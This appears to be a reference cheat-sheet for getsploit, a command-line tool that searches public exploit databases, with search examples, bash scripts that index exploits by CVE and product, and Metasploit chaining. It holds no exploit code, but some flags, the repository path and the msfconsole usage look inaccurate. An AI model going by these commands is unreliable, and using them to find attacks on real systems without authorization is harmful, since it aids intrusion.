Zum Inhalt springen
1337skills 1337skills - Referenzen

getsploit

Overview

Abschnitt betitelt „Overview“

getsploit is a command-line tool that searches and downloads exploit code from multiple repositories including Exploit-DB, Metasploit Framework, and Packet Storm Security. It aggregates exploit intelligence for vulnerability research and authorized penetration testing activities.

getsploit is essential for:

  • Exploit proof-of-concept research
  • Vulnerability validation and verification
  • Penetration testing and assessment
  • Exploit code adaptation and customization
  • Security research and analysis
  • Attack surface evaluation

Installation

Abschnitt betitelt „Installation“

Prerequisites

Abschnitt betitelt „Prerequisites“
  • Python 3.6+
  • pip (Python package manager)
  • Linux/macOS/Windows
  • Internet connectivity

Install via pip

Abschnitt betitelt „Install via pip“
# Install from PyPI
pip install getsploit

# Verify installation
getsploit -V
getsploit --help

Install from Source

Abschnitt betitelt „Install from Source“
# Clone repository
git clone https://github.com/vulhub/getsploit.git
cd getsploit

# Install dependencies
pip install -r requirements.txt

# Run directly
python -m getsploit --help

# Or install locally
pip install -e .

Update

Abschnitt betitelt „Update“
# Update to latest version
pip install --upgrade getsploit

# Check version
getsploit --version

Core Commands

Abschnitt betitelt „Core Commands“

Basic Usage

Abschnitt betitelt „Basic Usage“
CommandPurposeExample
getsploit <query>Search for exploitsgetsploit apache 2.4.49
getsploit -hShow helpgetsploit -h
getsploit -VShow versiongetsploit -V
getsploit --updateUpdate exploit databasegetsploit --update

Search Options

Abschnitt betitelt „Search Options“
OptionPurposeExample
-e, --edbSearch Exploit-DB onlygetsploit -e "CVE-2021-1234"
-m, --msfSearch Metasploit onlygetsploit -m "windows privilege"
-p, --pstSearch Packet Storm onlygetsploit -p "php vulnerability"
-t, --typeFilter by exploit typegetsploit -t "remote" apache

Basic Search Operations

Abschnitt betitelt „Basic Search Operations“
Abschnitt betitelt „Simple Exploit Search“
# Search all repositories
getsploit apache 2.4.49

# Search by CVE number
getsploit CVE-2021-44228

# Search by application
getsploit wordpress

# Search by vulnerability type
getsploit "remote code execution"

Search with Repository Filter

Abschnitt betitelt „Search with Repository Filter“
# Search Exploit-DB only
getsploit -e "nginx privilege escalation"

# Search Metasploit only
getsploit -m "windows domain privilege"

# Search Packet Storm only
getsploit -p "php injection"

Filter by Exploit Type

Abschnitt betitelt „Filter by Exploit Type“
# Find remote code execution exploits
getsploit -t "remote" "apache"

# Find local privilege escalation
getsploit -t "local" "kernel"

# Find denial of service
getsploit -t "dos" "dns"

Exploit Database Search Strategies

Abschnitt betitelt „Exploit Database Search Strategies“

Search by Vulnerability

Abschnitt betitelt „Search by Vulnerability“
# SQL injection exploits
getsploit "sql injection" wordpress

# Cross-site scripting
getsploit "xss" "drupal"

# Path traversal
getsploit "path traversal" php

# Command injection
getsploit "command injection" web

Search by Application

Abschnitt betitelt „Search by Application“
# WordPress vulnerabilities
getsploit wordpress

# Drupal exploits
getsploit drupal

# Apache web server
getsploit apache

# PHP framework vulnerabilities
getsploit laravel

Search by OS/Platform

Abschnitt betitelt „Search by OS/Platform“
# Windows privilege escalation
getsploit -t "local" "windows"

# Linux kernel exploits
getsploit -t "local" "linux kernel"

# macOS vulnerabilities
getsploit -t "remote" "macos"

Advanced Search Techniques

Abschnitt betitelt „Advanced Search Techniques“

Multi-Term Searches

Abschnitt betitelt „Multi-Term Searches“
# Combine application and version
getsploit "apache 2.4.49"

# With vulnerability type
getsploit "wordpress 5.0 remote"

# Application and CVE
getsploit "wordpress CVE-2020"

Specific CVE Research

Abschnitt betitelt „Specific CVE Research“
# Log4j vulnerability (widespread)
getsploit CVE-2021-44228

# WordPress plugin vulnerability
getsploit CVE-2020-6450

# Kernel privilege escalation
getsploit CVE-2021-22555

Vulnerability Pattern Searches

Abschnitt betitelt „Vulnerability Pattern Searches“
# All Struts vulnerabilities
getsploit "apache struts"

# Tomcat exploits
getsploit "tomcat"

# Node.js vulnerabilities
getsploit "node.js" -t "remote"

Download and Extraction

Abschnitt betitelt „Download and Extraction“

Download Exploit Code

Abschnitt betitelt „Download Exploit Code“
# Search returns exploit information
getsploit apache 2.4.49

# Output shows:
# - Exploit ID
# - Title
# - Type
# - Link to code
# - Source repository

View Exploit Details

Abschnitt betitelt „View Exploit Details“
# Search with verbose output
getsploit -v apache 2.4.49

# Review exploit information before download
# - Author
# - Verification status
# - Last updated date

Save Search Results

Abschnitt betitelt „Save Search Results“
# Redirect output to file
getsploit wordpress > wordpress_exploits.txt

# Save specific results
getsploit -e "sql injection" > edb_sqli.txt

# Parse results programmatically
getsploit apache 2.4.49 | grep -oE "exploit-[0-9]+|cve-[0-9-]+"

Practical Exploitation Workflows

Abschnitt betitelt „Practical Exploitation Workflows“

Vulnerability Assessment Workflow

Abschnitt betitelt „Vulnerability Assessment Workflow“
# 1. Identify target technology
# Example: WordPress 5.0 running

# 2. Search for known vulnerabilities
getsploit "wordpress 5.0"

# 3. Review exploit types
getsploit -e "wordpress 5.0" | grep -i "plugin\|theme"

# 4. Download promising exploits
# (Follow links from search results)

# 5. Analyze code for applicability
# (Test in lab environment first)

Known CVE Exploitation

Abschnitt betitelt „Known CVE Exploitation“
# 1. Identify CVE
# Example: CVE-2021-44228 (Log4j)

# 2. Find exploits
getsploit CVE-2021-44228

# 3. Search specific sources
getsploit -m CVE-2021-44228    # Metasploit modules
getsploit -e CVE-2021-44228    # Exploit-DB POCs

# 4. Select appropriate exploit
# (Choose by platform, method, complexity)

Application-Specific Research

Abschnitt betitelt „Application-Specific Research“
# 1. Identify running application
# Example: Apache Struts 2.0

# 2. Search comprehensively
getsploit "apache struts"

# 3. Filter by vulnerability type
getsploit -t "remote" "apache struts"

# 4. Research by year
getsploit "struts 2009"  # Earlier vulnerabilities
getsploit "struts 2017"  # More recent exploits

Integration with Other Tools

Abschnitt betitelt „Integration with Other Tools“

Chain with Metasploit

Abschnitt betitelt „Chain with Metasploit“
# Find exploit in Metasploit
getsploit -m "apache struts"

# Get module path from results
# Load in msfconsole
msfconsole -m "exploit/linux/http/apache_struts_rce"

Integration with searchsploit

Abschnitt betitelt „Integration with searchsploit“
# Alternative: Use searchsploit (locally cached)
searchsploit "apache struts"

# Cross-reference with getsploit
getsploit "apache struts" | grep -v "$(searchsploit -t apache struts)"

Organize Results for Testing

Abschnitt betitelt „Organize Results for Testing“
# Save organized results
mkdir -p exploit_research/wordpress
getsploit wordpress > exploit_research/wordpress/search_results.txt

mkdir -p exploit_research/drupal
getsploit drupal > exploit_research/drupal/search_results.txt

# Create index
echo "# Exploit Research Results" > exploit_research/README.md

Exploit Classification and Analysis

Abschnitt betitelt „Exploit Classification and Analysis“

Classify by Exploitation Method

Abschnitt betitelt „Classify by Exploitation Method“
# Remote code execution
getsploit -t "remote" "application"

# Privilege escalation
getsploit -t "local" "privilege"

# Denial of service
getsploit -t "dos" "service"

# Authentication bypass
getsploit "authentication bypass" app

Analyze Exploit Reliability

Abschnitt betitelt „Analyze Exploit Reliability“
# Search for verified/tested exploits
getsploit -e "apache"        # Exploit-DB (verified)

# Search for modules
getsploit -m "wordpress"     # Metasploit (tested)

# Review multiple sources
getsploit -p "wordpress"     # Packet Storm (research)

Filter by Exploit Status

Abschnitt betitelt „Filter by Exploit Status“
# Recently added exploits
getsploit -e "2024" wordpress

# Older, battle-tested exploits
getsploit -e "2015" linux

# Compare exploit counts
getsploit -m "apache" | wc -l
getsploit -e "apache" | wc -l

Automation Scripts

Abschnitt betitelt „Automation Scripts“

Batch Vulnerability Scanning

Abschnitt betitelt „Batch Vulnerability Scanning“
#!/bin/bash
# Search for exploits for multiple CVEs

CVES=(
  "CVE-2021-44228"
  "CVE-2021-22555"
  "CVE-2020-1938"
)

OUTPUT_DIR="cve_research"
mkdir -p "$OUTPUT_DIR"

for cve in "${CVES[@]}"; do
  echo "Researching $cve..."
  getsploit "$cve" > "$OUTPUT_DIR/${cve}_results.txt"
  
  # Count exploits found
  COUNT=$(wc -l < "$OUTPUT_DIR/${cve}_results.txt")
  echo "$cve: $COUNT results found"
done

Vulnerability Database Builder

Abschnitt betitelt „Vulnerability Database Builder“
#!/bin/bash
# Build database of exploits for target technologies

TARGETS=(
  "wordpress"
  "drupal"
  "joomla"
  "apache"
  "nginx"
)

DB_DIR="exploit_database"
mkdir -p "$DB_DIR"

for target in "${TARGETS[@]}"; do
  echo "Building database for $target..."
  
  # Search all sources
  getsploit -e "$target" > "$DB_DIR/${target}_edb.txt"
  getsploit -m "$target" > "$DB_DIR/${target}_msf.txt"
  getsploit -p "$target" > "$DB_DIR/${target}_pst.txt"
  
  # Create summary
  TOTAL=$(($(wc -l < "$DB_DIR/${target}_edb.txt") + \
           $(wc -l < "$DB_DIR/${target}_msf.txt") + \
           $(wc -l < "$DB_DIR/${target}_pst.txt")))
  
  echo "$target: $TOTAL exploits indexed"
done

Continuous Vulnerability Monitoring

Abschnitt betitelt „Continuous Vulnerability Monitoring“
#!/bin/bash
# Monitor new exploits for critical applications

MONITOR_TARGETS=(
  "wordpress"
  "apache"
  "openssh"
)

RESULTS_DIR="vulnerability_monitoring"
mkdir -p "$RESULTS_DIR"

DATE=$(date +%Y%m%d)

for target in "${MONITOR_TARGETS[@]}"; do
  LATEST_FILE="$RESULTS_DIR/${target}_latest.txt"
  CURRENT_FILE="$RESULTS_DIR/${target}_${DATE}.txt"
  
  # Get current exploits
  getsploit "$target" | sort > "$CURRENT_FILE"
  
  # Compare with previous
  if [ -f "$LATEST_FILE" ]; then
    NEW_EXPLOITS=$(comm -13 "$LATEST_FILE" "$CURRENT_FILE")
    if [ -n "$NEW_EXPLOITS" ]; then
      echo "New exploits for $target:"
      echo "$NEW_EXPLOITS"
    fi
  fi
  
  # Update latest
  cp "$CURRENT_FILE" "$LATEST_FILE"
done

Search Result Analysis

Abschnitt betitelt „Search Result Analysis“

Parse Search Results

Abschnitt betitelt „Parse Search Results“
# Extract exploit IDs
getsploit apache | grep -oE "EDB-[0-9]+" | sort -u

# Extract CVE references
getsploit wordpress | grep -oE "CVE-[0-9-]+" | sort -u

# Count results by type
getsploit apache | grep -c "remote"
getsploit apache | grep -c "local"

Compare Sources

Abschnitt betitelt „Compare Sources“
# Find exploits in Exploit-DB
getsploit -e wordpress > edb_wp.txt

# Find exploits in Metasploit
getsploit -m wordpress > msf_wp.txt

# Find unique to Exploit-DB
comm -23 <(sort edb_wp.txt) <(sort msf_wp.txt)

# Find in all sources
getsploit wordpress | sort -u > all_wp.txt

Best Practices

Abschnitt betitelt „Best Practices“

Responsible Exploit Research

Abschnitt betitelt „Responsible Exploit Research“
  • Verify applicability: Confirm vulnerability affects target before exploitation
  • Test in isolated lab: Always test in controlled environment first
  • Review exploit code: Analyze code for malicious intent before execution
  • Maintain documentation: Track exploit usage for reporting
  • Only test authorized targets: Ensure proper authorization before testing
  • Keep audit trail: Document all exploit testing activities
  • Update regularly: Keep exploit database current with --update

Effective Search Strategies

Abschnitt betitelt „Effective Search Strategies“
  • Use specific terms: More specific searches yield relevant results
  • Include version numbers: Narrow results with application versions
  • Cross-reference CVEs: Verify CVE numbers with multiple sources
  • Search all repositories: Different sources contain unique exploits
  • Review metadata: Check author, date, and verification status
  • Compare multiple exploits: Select most reliable implementation

Troubleshooting

Abschnitt betitelt „Troubleshooting“
IssueSolution
No results foundTry broader search terms or different keywords
Connection errorsCheck internet connectivity; verify target is accessible
Old databaseRun getsploit --update to refresh exploit database
Exploit not foundTry searching by CVE number or different terms
Metasploit resultsVerify Metasploit Framework installation for module paths

Update and Maintenance

Abschnitt betitelt „Update and Maintenance“

Keep Database Current

Abschnitt betitelt „Keep Database Current“
# Update exploit database
getsploit --update

# Schedule regular updates (cron)
0 0 * * * /usr/local/bin/getsploit --update  # Daily at midnight

Resources

Abschnitt betitelt „Resources“

Summary

Abschnitt betitelt „Summary“

getsploit aggregates exploit intelligence from multiple authoritative sources:

  1. Exploit-DB - Largest public exploit repository
  2. Metasploit Framework - Professional exploitation platform
  3. Packet Storm Security - Historical vulnerability research

Key capabilities include:

  • Multi-repository exploit searching
  • Flexible filtering by type and source
  • CVE-based vulnerability research
  • Integration with exploitation frameworks
  • Automated vulnerability monitoring

Use getsploit to research known vulnerabilities, validate attack vectors, and build exploit collections for authorized penetration testing and security assessment activities.